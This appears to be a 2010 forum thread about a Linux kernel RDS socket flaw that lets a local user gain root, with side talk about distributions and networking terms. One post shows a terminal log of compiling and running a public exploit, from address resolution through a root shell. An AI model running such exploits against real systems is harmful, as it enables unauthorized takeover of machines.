Posted on 10/22/2010 6:09:25 AM PDT by ShadowAce
Sooo... once you break in then you can own it. But you still have to break in first, right?
More reasons why my abacus is still the only virus free computational device I own.
That is what I understand, also. Doesn’t seem quite as dangerous as they’re making it out to be.
I wish I knew more about how Puppy Linux works; I can’t even unzip an RPM file with unrmp.pet
Maybe I should burn another ISO with a different Linux?
Bookmark
If the documentation isn’t helping you, then yeah. I’m much more familiar with the RPM-based distros, like Fedora.
Is that one free too? I’ll google it.
Obviously, it's more of an issue on multi-user systems. Hosting systems with shell access would be particularly vulnerable. Thank God it's not a remote exploit.
Fedora is free. Most stuff works right out of the box, but you'll want to add the rpmfusion repositories to get the best use of it. (for certain codecs and other stuff.)
“Reliable datagram....”?
Isn’t that an oxymoron?
Only in UDP.
$ gcc linux-rds-exploit.c -o linux-rds-exploit
$ file linux-rds-exploit
linux-rds-exploit: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped
$ id
uid=500(zeugma) gid=500(zeugma) groups=500(zeugma),1000(shared)
$ touch /etc/deleteme.txt
touch: cannot touch `/etc/deleteme.txt': Permission denied
$ ./linux-rds-exploit
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xf89c0654
[+] Resolved rds_ioctl to 0xf89bb06a
[+] Resolved commit_creds to 0xc046059f
[+] Resolved prepare_kernel_cred to 0xc0460410
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
sh-4.0# touch /etc/deleteme.txt
sh-4.0# rm /etc/deleteme.txt
sh-4.0# exit
~/Download :)
Wow. Quite interesting. I wonder how long it will take to get a large company’s servers all patched, so the employees don’t go wandering....
Youch.
I’m talking in general - i.e., in networking for the last, oh, 40 years, the idea is that datagram service isn’t reliable. You flip it out on the wire, and no guarantee is made of delivery; datagram service is “best effort” delivery.
My first reaction upon reading of “reliable datagram service” was to wonder “Isn’t that what a connection-based protocol is?” You have an indication when you sent the datagram that there was sufficient buffering at the receiver to receive the datagram and all that?
Sigh. Computing hasn’t been the same since we allowed the marketing people to start inventing terms...
Companies don't grant shell access to employees that don't need it.
And, using an exploit like this to get unauthorized root access is grounds for termination at every company I've worked for.
If you are talking about UDP, yes. RDP is a different protocol.
What is RDS and why did we build it?
Reliable Datagram Sockets (RDS) provide in order, non-duplicating, highly available, low overhead, reliable delivery of datagrams between hundreds of thousands of non-connected endpoints.